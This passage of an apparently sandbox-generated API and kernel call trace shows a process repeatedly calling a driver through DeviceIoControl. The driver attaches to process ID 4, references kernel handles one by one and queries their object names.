lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.484] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.484] PsAcquireProcessExitSynchronization () returned 0x0 [0200.484] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.484] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f81050, HandleInformation=0x0) returned 0x0 [0200.484] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.484] PsReleaseProcessExitSynchronization () returned 0x2 [0200.484] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.484] ObQueryNameString (in: Object=0xfffffa8001f81050, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.484] ObfDereferenceObject (Object=0xfffffa8001f81050) returned 0x2 [0200.484] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.485] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.485] PsAcquireProcessExitSynchronization () returned 0x0 [0200.485] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.485] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8bab0, HandleInformation=0x0) returned 0x0 [0200.485] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.485] PsReleaseProcessExitSynchronization () returned 0x2 [0200.485] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.485] ObQueryNameString (in: Object=0xfffffa8001f8bab0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.485] ObfDereferenceObject (Object=0xfffffa8001f8bab0) returned 0x2 [0200.485] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.485] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.486] PsAcquireProcessExitSynchronization () returned 0x0 [0200.486] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.486] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f82d20, HandleInformation=0x0) returned 0x0 [0200.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.486] PsReleaseProcessExitSynchronization () returned 0x2 [0200.486] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.486] ObQueryNameString (in: Object=0xfffffa8001f82d20, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.486] ObfDereferenceObject (Object=0xfffffa8001f82d20) returned 0x2 [0200.486] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.486] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.486] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.486] PsAcquireProcessExitSynchronization () returned 0x0 [0200.486] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.486] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8af20, HandleInformation=0x0) returned 0x0 [0200.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.487] PsReleaseProcessExitSynchronization () returned 0x2 [0200.487] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.487] ObQueryNameString (in: Object=0xfffffa8001f8af20, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.487] ObfDereferenceObject (Object=0xfffffa8001f8af20) returned 0x2 [0200.487] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.487] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.487] PsAcquireProcessExitSynchronization () returned 0x0 [0200.487] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.487] ObReferenceObjectByHandle (in: Handle=0xffffffff800006bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f812c0, HandleInformation=0x0) returned 0x0 [0200.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.487] PsReleaseProcessExitSynchronization () returned 0x2 [0200.487] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.487] ObQueryNameString (in: Object=0xfffffa8001f812c0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.487] ObfDereferenceObject (Object=0xfffffa8001f812c0) returned 0x2 [0200.487] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.488] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.488] PsAcquireProcessExitSynchronization () returned 0x0 [0200.488] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.494] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8a980, HandleInformation=0x0) returned 0x0 [0200.494] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.501] PsReleaseProcessExitSynchronization () returned 0x2 [0200.502] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.502] ObQueryNameString (in: Object=0xfffffa8001f8a980, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.502] ObfDereferenceObject (Object=0xfffffa8001f8a980) returned 0x2 [0200.502] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.502] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.502] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.502] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.502] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.502] PsAcquireProcessExitSynchronization () returned 0x0 [0200.503] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.503] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f83e50, HandleInformation=0x0) returned 0x0 [0200.503] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.503] PsReleaseProcessExitSynchronization () returned 0x2 [0200.503] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.503] ObQueryNameString (in: Object=0xfffffa8001f83e50, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.503] ObfDereferenceObject (Object=0xfffffa8001f83e50) returned 0x2 [0200.503] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.503] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.503] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.503] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.503] PsAcquireProcessExitSynchronization () returned 0x0 [0200.504] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.504] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f882f0, HandleInformation=0x0) returned 0x0 [0200.504] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.504] PsReleaseProcessExitSynchronization () returned 0x2 [0200.504] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.504] ObQueryNameString (in: Object=0xfffffa8001f882f0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.504] ObfDereferenceObject (Object=0xfffffa8001f882f0) returned 0x2 [0200.504] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.504] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.504] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.505] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.505] PsAcquireProcessExitSynchronization () returned 0x0 [0200.505] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.505] ObReferenceObjectByHandle (in: Handle=0xffffffff800006cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f82460, HandleInformation=0x0) returned 0x0 [0200.505] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.505] PsReleaseProcessExitSynchronization () returned 0x2 [0200.505] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.505] ObQueryNameString (in: Object=0xfffffa8001f82460, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.505] ObfDereferenceObject (Object=0xfffffa8001f82460) returned 0x2 [0200.505] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.506] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.506] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.506] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.506] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.506] PsAcquireProcessExitSynchronization () returned 0x0 [0200.506] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.506] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f898b0, HandleInformation=0x0) returned 0x0 [0200.506] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.506] PsReleaseProcessExitSynchronization () returned 0x2 [0200.506] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.506] ObQueryNameString (in: Object=0xfffffa8001f898b0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.506] ObfDereferenceObject (Object=0xfffffa8001f898b0) returned 0x2 [0200.506] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.507] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.507] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.507] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.507] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.507] PsAcquireProcessExitSynchronization () returned 0x0 [0200.507] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.507] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f84f20, HandleInformation=0x0) returned 0x0 [0200.507] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.507] PsReleaseProcessExitSynchronization () returned 0x2 [0200.507] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.507] ObQueryNameString (in: Object=0xfffffa8001f84f20, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.507] ObfDereferenceObject (Object=0xfffffa8001f84f20) returned 0x2 [0200.507] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.508] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.508] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.508] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.508] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.508] PsAcquireProcessExitSynchronization () returned 0x0 [0200.508] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.508] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f88d20, HandleInformation=0x0) returned 0x0 [0200.508] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.508] PsReleaseProcessExitSynchronization () returned 0x2 [0200.508] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.508] ObQueryNameString (in: Object=0xfffffa8001f88d20, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.508] ObfDereferenceObject (Object=0xfffffa8001f88d20) returned 0x2 [0200.508] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.509] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.509] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.509] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.509] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.509] PsAcquireProcessExitSynchronization () returned 0x0 [0200.509] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.509] ObReferenceObjectByHandle (in: Handle=0xffffffff800006dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f83590, HandleInformation=0x0) returned 0x0 [0200.509] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.509] PsReleaseProcessExitSynchronization () returned 0x2 [0200.509] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.509] ObQueryNameString (in: Object=0xfffffa8001f83590, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.509] ObfDereferenceObject (Object=0xfffffa8001f83590) returned 0x2 [0200.509] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.509] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.509] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.510] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.510] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.510] PsAcquireProcessExitSynchronization () returned 0x0 [0200.510] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.510] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f88780, HandleInformation=0x0) returned 0x0 [0200.510] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.510] PsReleaseProcessExitSynchronization () returned 0x2 [0200.510] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.510] ObQueryNameString (in: Object=0xfffffa8001f88780, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.510] ObfDereferenceObject (Object=0xfffffa8001f88780) returned 0x2 [0200.510] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.510] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.510] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.510] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.510] PsAcquireProcessExitSynchronization () returned 0x0 [0200.511] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.511] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f852c0, HandleInformation=0x0) returned 0x0 [0200.511] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.511] PsReleaseProcessExitSynchronization () returned 0x2 [0200.511] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.511] ObQueryNameString (in: Object=0xfffffa8001f852c0, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.511] ObfDereferenceObject (Object=0xfffffa8001f852c0) returned 0x2 [0200.511] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.511] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.511] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.511] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.511] PsAcquireProcessExitSynchronization () returned 0x0 [0200.511] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.511] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e8, 